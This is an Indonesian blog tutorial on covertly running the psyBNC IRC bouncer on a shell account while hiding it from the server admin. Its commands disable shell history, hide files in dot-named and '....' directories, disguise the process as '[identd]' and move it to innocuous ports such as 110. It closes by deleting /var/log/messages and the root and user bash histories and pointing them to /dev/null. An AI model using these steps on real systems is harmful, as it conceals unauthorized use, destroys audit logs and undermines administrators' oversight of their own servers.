Trik Instalasi psyBNC/eggdrop di shell hacker

Ok.. pertama yang perlu kita siapkan

1. shell hostingan anda
2. rokok a-mild (bagi yg merokok)
3. putty tentunya
4. sedikit pemikiran

okey setelah semua sudah siap kita login ke server kita melalui putty  baik dia menggunakan SSH1 atau SSH2.

login as: scut
scut@216.205.87.70's password:
Last login: Thu Jun 20 09:13:26 2002 from 202.95.158.152 [scut@d11303scut]$ unset HISTFILE <<-- * [scut@d11303 scut]$ unset HISTSIZE <<-- *
[scut@d11303 scut]$

(*) ketik command tersebut supaya lebih aman anda di server. selanjutnya kita buat direktory yang sekiranya nggak diketahui oleh  admin yaitu:

[scut@d11303 scut]$ mkdir "...." <<-- ini dia direktori kita setelah itu kita masuk ke direktori tersebut
[scut@d11303 scut]$ cd "...." <<-- masuk ke direktori

nah setelah itu kita Download file psyBNC baik itu yang static buat  linux, sunOS, FreeBSD nah kebetulan yang saya ambil contoh adalah Linux:

[scut@d11303 ....]$ wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz

jangan lupa setelah anda Download psyBNC tersebut rubah file  psyBNC.tar.gz anda dengan nama lain yang nggak nampak bila di ls -al semisal .sh atau .mud atau yang lain lah ;)

[scut@d11303 ....]$ mv psyBNC2.2.1-linux-i86-static.tar.gz .sh

kemudian extract file psyBNC anda dengan tar -zxvf .sh dan jangan lupa pula ganti nama folder psybnc (setelah di extract akan muncul folder psybnc) dengan .log atau apa saja ;)

[scut@d11303 ....]$ mv psybnc .log
[scut@d11303 ....]$ cd .log

nah setelah anda melakukan perintah penginstalan psyBNC dengan make  jangan lupa anda mengganti port psybnc.conf anda dengan port yang tidak menilbulkan kecurigaan bagi admin semisal port 53 25 110 75 atau apa saja ;)  dengan cara:

[scut@d11303 ....]$ pico psybnc.conf

atau bila command pico tidak ada atau ee (bagi FreeBSD) gunakan cara  lain dengan

[scut@d11303 ....]$ cat psybnc.conf
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*

Kita gunakan command :

[scut@d11303 ....]$ echo "PSYBNC.SYSTEM.PORT1=110"scut.conf
[scut@d11303 ....]$ echo "PSYBNC.SYSTEM.HOST1=*"scut.conf
[scut@d11303 ....]$ echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*"scut.conf


catatan : 110 <<-- port yang semula 31337 diganti dengan 110 nah  setelah selesai anda lakukan trik sebagai berikut dan tak lupa del file psybnc.conf anda karena psybnc.conf kita duplicat menjadi scut.conf  ketik command pwd untuk mengetahui dimana anda berada saat ini

(folder)

[scut@d11303 .log]$ pwd
/home/scut/..../.log

ketik command:


[scut@d11303 .log]$ PATH=$PATH:/home/scut/"...."/.log

Setelah ketik command tersebut kita mulai trik menjadi  siluman di server anda ;)  ubah nama psybnc dan psybnc.conf (dalam hal ini scut.conf) dengan:

[scutscutscut@d11303 .log]$ mv psybnc "[identd] " <<-
"[identd]spasi1x" [scut@d11303 .log]$ mv scut.conf " " <<-- "spasi2x"

setelah itu kita jalankan command di bawah ini untuk eksekusi akhir:


[scut@d11303 .log]$ "[identd] " " "

.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000  the most psychoid  and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'

Configuration File:
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 11111
psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
[scut@d11303 .log]$

catatan: [scut@d11303 .log]$ "[identd] " " " <<-- command ini sama  dengan ./psybnc psybnc.conf

nah setelah itu coba kita ketik command ps -x untuk mengetahui proses  di background shell

[scut@d11303 .log]$ ps -x
PID TTY STAT TIME COMMAND
31544 ? S 0:16 ./bash
31629 ? S 0:06 sendmail to scut
2212 pts/1 S 0:00 -bash
2291 pts/1 S 0:00 [identd]
2309 pts/1 R 0:00 ps -x

catatan: 2291 pts/1 S 0:00 [identd] <

psybnc anda yang berubah setelah kita lakukan trik tersebut namun jangan keburu gembira dahulu, karena mungkin admin curiga dengan background yang ada di server tersebut dan admin akan mencarinya dengan:

[scut@d11303 .log]$ find | grep psybnc <<-- kemungkinan yang dilakukan karena biasanya admin tahu kalau user selalu run psybnc maka akan nampak nama nama psybnc anda

./log/psybnc.log
./log/psybnc.log.old
./psybncchk
./psybnc.pid


Untuk itu kita perlu mengganti nama nama tersebut dengan yang lain semisal

[scut@d11303 .log]$ mv psybnc.pid .log
[scut@d11303 log]$ mv psybnc.log .sh
[scut@d11303 log]$ mv psybnc.log.old .mud


Dengan cara tersebut kemungkinan sang admin nggak akan curiga  terhadap background yang ada di server anda ;) dan yang terakhir jangan lupa bersihkan log anda dengan mengetik command:

rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
Post a Comment

Popular posts from this blog

Update WINDOWS 7 yang wajib dihindari

Panduan 5menit untuk mencari backlink berkualitas tinggi

Cara Pasang Meta Tag SEO Friendly dan Valid HTML5 pada Blogger